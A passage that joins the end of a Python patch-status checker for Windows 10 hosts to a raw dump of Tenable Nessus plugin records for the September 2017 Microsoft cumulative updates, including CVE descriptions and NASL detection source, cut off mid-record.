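    # though this KB id never appears in the installed-hotfix list.
    if host.ubr >= min_ubr:
        return "patched", f"UBR {host.ubr} >= {min_ubr} ({kb} or a superseding rollup)"
    if kb in host.hotfixes:
        # Typical of an update staged but not yet applied by a reboot.
        return "inconsistent", f"{kb} listed but running UBR {host.ubr} < {min_ubr}"
    return "missing", f"{kb} not present: UBR {host.ubr} < {min_ubr}"


def scan(hosts: list[Host]) -> dict[str, str]:
    """Map host name -> verdict, the shape a reporting step would consume."""
    return {h.name: rollup_status(h)[0] for h in hosts}


# Constructed sample inventory (not real hosts; UBR values below the
# thresholds are arbitrary stale revisions).
SAMPLE_HOSTS = [
    Host("ltsb-patched", "Windows 10 Enterprise 2015 LTSB", "10240", 17609),
    Host("ltsb-stale", "Windows 10 Enterprise 2015 LTSB", "10240", 17443),
    Host("pro-1507", "Windows 10 Pro", "10240", 17443),
    Host("pro-1511-ok", "Windows 10 Pro", "10586", 1106),
    Host("pro-1511-pending", "Windows 10 Pro", "10586", 1045, {"KB4038783"}),
    Host("pro-1607", "Windows 10 Pro", "14393", 1715),
]

if __name__ == "__main__":
    for host in SAMPLE_HOSTS:
        verdict, reason = rollup_status(host)
        print(f"{host.name:18} {verdict:15} {reason}")
```

The reason to compare the running revision rather than grep for the KB id is the same reason the plugin uses smb_check_rollup: on a host that has taken any later cumulative update, the hotfix list will not contain KB4038781 at all even though every fix in it is present, and a host that has installed the update but not rebooted can list the KB while still running the old kernel and browser code. The inconsistent verdict exists to surface that second case instead of silently reporting it as patched.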
(CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. 
The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - An information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the user's system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the user's system.\n (CVE-2017-8683)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. 
\n (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system.\n (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the user's system.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. (CVE-2017-8699)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. 
The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality.\n (CVE-2017-8702)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8713)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. 
An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.(CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. 
The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8660, CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8738, CVE-2017-8752, CVE-2017-8753,\n CVE-2017-8755, CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
(CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-09-12T00:00:00", "title": "KB4038783: Windows 10 Version 1511 September 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8681", "CVE-2017-8643", "CVE-2017-8713", "CVE-2017-8741", "CVE-2017-8757", "CVE-2017-8707", "CVE-2017-8695", "CVE-2017-8756", "CVE-2017-8682", "CVE-2017-0161", "CVE-2017-8719", "CVE-2017-8737", "CVE-2017-8699", "CVE-2017-8753", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8709", "CVE-2017-8683", "CVE-2017-8752", "CVE-2017-8678", "CVE-2017-8628", "CVE-2017-8754", "CVE-2017-8735", "CVE-2017-8738", "CVE-2017-8728", "CVE-2017-8677", "CVE-2017-11766", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8679", "CVE-2017-8660", "CVE-2017-8687", "CVE-2017-8734", "CVE-2017-8759", "CVE-2017-8676", "CVE-2017-8708", "CVE-2017-8688", "CVE-2017-8720", "CVE-2017-8692", "CVE-2017-8706", "CVE-2017-8702", "CVE-2017-8736", "CVE-2017-8529", "CVE-2017-8733", "CVE-2017-8755", "CVE-2017-8675", "CVE-2017-8723"], "modified": "2017-09-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038783.NASL", "href": "https://www.tenable.com/plugins/nessus/103129", "sourceData": "#\n# (C) Tenable 
Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103129);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/28\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8628\",\n \"CVE-2017-8643\",\n \"CVE-2017-8660\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8702\",\n \"CVE-2017-8706\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8713\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8723\",\n \"CVE-2017-8728\",\n \"CVE-2017-8733\",\n \"CVE-2017-8734\",\n \"CVE-2017-8735\",\n \"CVE-2017-8736\",\n \"CVE-2017-8737\",\n \"CVE-2017-8738\",\n \"CVE-2017-8741\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\",\n \"CVE-2017-8752\",\n \"CVE-2017-8753\",\n \"CVE-2017-8754\",\n \"CVE-2017-8755\",\n \"CVE-2017-8756\",\n \"CVE-2017-8757\",\n \"CVE-2017-8759\",\n \"CVE-2017-11766\"\n );\n script_xref(name:\"MSKB\", value:\"4038783\");\n script_xref(name:\"MSFT\", value:\"MS17-4038783\");\n\n script_name(english:\"KB4038783: Windows 10 Version 1511 September 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038783.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to 
a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. 
The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - An information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the user's system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the user's system.\n (CVE-2017-8683)\n\n - An information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. 
\n (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system.\n (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the user's system.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. (CVE-2017-8699)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. 
The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality.\n (CVE-2017-8702)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8713)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system.(CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights.(CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. 
An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.(CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. 
The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8660, CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8738, CVE-2017-8752, CVE-2017-8753,\n CVE-2017-8755, CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
(CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038783/windows-10-update-kb4038783\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?15cd901b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4038783.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038783');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038783])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:59", "description": "The 
remote Windows host is missing security update 4038782.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. 
The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - An information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the user's system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the user's system. (CVE-2017-8683)\n\n - A memory corruption vulnerability exists in the Windows\n Server DHCP service when an attacker sends specially\n crafted packets to a DHCP failover server. 
An attacker\n who successfully exploited the vulnerability could\n either run arbitrary code on the DHCP failover server or\n cause the DHCP service to become nonresponsive.\n (CVE-2017-8686)\n\n - An information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the user's system.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. 
If the current user is logged on with\n administrative user rights, an attacker could take\n control of the affected system.\n (CVE-2017-8699)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality.\n (CVE-2017-8702)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system.\n (CVE-2017-8704)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8711,\n CVE-2017-8712, CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM\n Host Agent Service of Remote Desktop Virtual Host role\n when it fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in 